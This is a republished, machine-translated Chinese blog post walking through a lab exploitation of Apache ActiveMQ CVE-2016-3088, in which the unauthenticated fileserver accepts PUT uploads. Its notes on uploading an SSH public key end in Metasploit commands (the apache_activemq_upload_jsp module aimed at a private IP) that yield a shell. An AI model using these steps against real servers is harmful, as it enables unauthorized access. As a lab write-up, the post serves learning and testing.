当前位置:网站首页>ActiveMQ--CVE-2016-3088

ActiveMQ--CVE-2016-3088

2022-06-25 19:09:00 B6 capsule

  

cve-2016-3088|LOFTER( Happy ) - Interest , More interesting cve-2016-3088 Related logs - LOFTERhttp://www.lofter.com/tag/CVE-2016-3088

ActiveMQ Arbitrary file write vulnerability (CVE-2016-3088)_skr... The blog of -CSDN Blog ActiveMQ Arbitrary file write vulnerability (CVE-2016-3088)ActiveMQ Introduce :Apache ActiveMQ It's Apache (Apache) A set of open source message middleware developed by the software foundation , It supports Java Message service 、 colony 、Spring Framework etc. . What is? : Introduction to message oriented middleware vulnerabilities :ActiveMQ Of web The console is divided into three applications ,admin、api and fileserver, among admin It's the admin page ,ap...https://blog.csdn.net/weixin_44311721/article/details/98085706

ActiveMQ Arbitrary file write vulnerability (CVE-2016-3088)_swordheart The blog of -CSDN Blog Vulnerability profile ActiveMQ web The console is divided into three applications ,admin、api and fileserver, among admin For administrator page ,api Interface for ,fileserver Interface for storing files ;admin and api Login is required to use ,fileserver You don't need to log in .fileserver It's a RESTful API Interface . We can go through GET、PUT、DELETE etc. HTTP Request to read and write the file stored in it . The design purpose is to make up for the defect that the message queue operation cannot transmit and store binary files , But then it turned out : Its utilization rate is not high, and file operations are prone to vulnerabilities, so https://blog.csdn.net/jd_cx/article/details/122553619

Set up SSH Sign in with a key | Novice tutorial We usually use PuTTY etc. SSH Remote management by client Linux The server . however , General password login , It's easy for the password to be cracked by violence . therefore , Generally we will SSH Is set to the default 22 External port , Or disable root The account login . Actually , There's a better way to be safe , And you can use it safely root The account logs in remotely —— That's logging in with a key . The principle of key form login is : Use key generator to make a pair of keys —— A public key and a private key . Add the public key to an account on the server ..https://www.runoob.com/w3cnote/set-ssh-login-key.html

 

Startup environment

Refer to the connection 1, There is no absolute path

 

  Try uploading ssh Public key

  Last , utilize msf success 

search CVE-2016-3088( Search for exploit modules )
use exploit/multi/http/apache_activemq_upload_jsp( Using modules )
set rhost 192.168.1.103( Set the target )
exploit( perform )
 obtain shell success

原网站

版权声明
本文为[B6 capsule]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202190521319784.html

边栏推荐

猜你喜欢

随机推荐